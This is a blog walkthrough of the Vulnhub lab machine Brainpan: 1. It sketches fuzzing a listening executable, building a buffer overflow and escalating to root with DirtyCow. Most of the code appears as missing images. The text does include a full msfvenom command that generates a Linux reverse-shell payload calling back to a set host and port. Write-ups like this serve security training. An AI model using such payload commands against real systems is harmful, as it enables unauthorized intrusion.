Vulnhub Brainpan: 1 Walkthrough

by Vince
in Blog
Hits: 18610

Referring to my list of must-do boxes, Brainpan is described as "intermediate" in terms of level of difficulty and I would say that's a fair assessment.  Not because it's significantly harder than the previous boxes, it is not.  It's actually fairly straightforward and easy to root.  However, it requires a couple of skills that you might not possess if you're on the new-ish side of hacking vulnerable boxes.  The two skills required are basic scripting in some language and buffer overflow.

I love buffer overflow.  With other methods of exploitation, there's always this feeling of ambiguity but with buffer overflow, I have a defined path, I follow the path, and it leads to what I want.  

I don't want to talk too much because if ever there was a spoiler, this would be it.


Starting off with an Nmap scan:




We find a couple of open ports, let's check out 9999:





At first, I thought 9999 was a web port but upon viewing the source, I realized it wasn't.

Let's use netcat:





Seems like no matter what I do, I get access denied.  I have some thoughts but I put that on hold.

Let's see what's on 10000:





Let's hit it with Nikto:





Let's check out what we've uncovered:





Putting some pieces together, I'm pretty sure this .exe file is what is listening on 9999.  I download it. 

Let's see what we can learn from strings:





I'll guess and say "shitstorm" is the password.

Let's take our password and pipe it with netcat:




Excellent.  It does nothing for me other than giving me "ACCESS GRANTED".  My hunch at this point is buffer overflow.  

Let's create a simple python script to fuzz this .exe on my Windows box:





Essentially, my script is feeding it 100 A's.  If our .exe accepts that, we're going to add 100 A's until it breaks.  

I get setup in Immunity:




I start fuzzing:




It breaks around 700 bytes.

Let's create a unique string and feed it to the application in order to find the exact location of the crash:




Taking our unique string and adding it to our script:




We execute our script and go back to immunity to find the location of the crash:




We use pattern_offset with EIP to get the exact byte count:




Now we're going to feed the application a list of bad chars in order to identify what we cannot use.  I've already removed the null byte x00:




We're going to follow in dump on ESP to see what's missing:




Looking at the dump, we see that the null byte is the only char we cannot use:




We fire up !mona modules in order to identify a module not using DEP or ASLR:




Verifying we have JMP ESP:




Mind you, I have brainpan.exe on my Windows machine in immunity.  I'm going this route because I can repeatedly crash the .exe and work out my solution prior to launching my attack on the Linux machine.  

I create shellcode for Windows Meterpreter and add it to my script:




I setup my handler:




I execute my script:




Excellent!  We have a shell!  Now we're going to create shellcode for our Linux machine:

msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.51 LPORT=53 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai





Adding our shellcode to the script:





Setting up our handler:




Excellent!  We get catch our shell and we identify the OS.  As always, I'm heading for DirtyCow but we don't have SSH access so I'm going to hope I can get to the prompt prior to the system crashing.

Downloading our exploit and executing it:




I get my prompt back prior to the server becoming unstable, I'm able to su to our user, and I'm able to execute the unstable fix.  #rootdance

That was fun!  I sort of breezed through the buffer overflow part because you either know it or you don't.  If you've been playing around with buffer overflow, I think this should give you enough information and this is the box to hone your skills.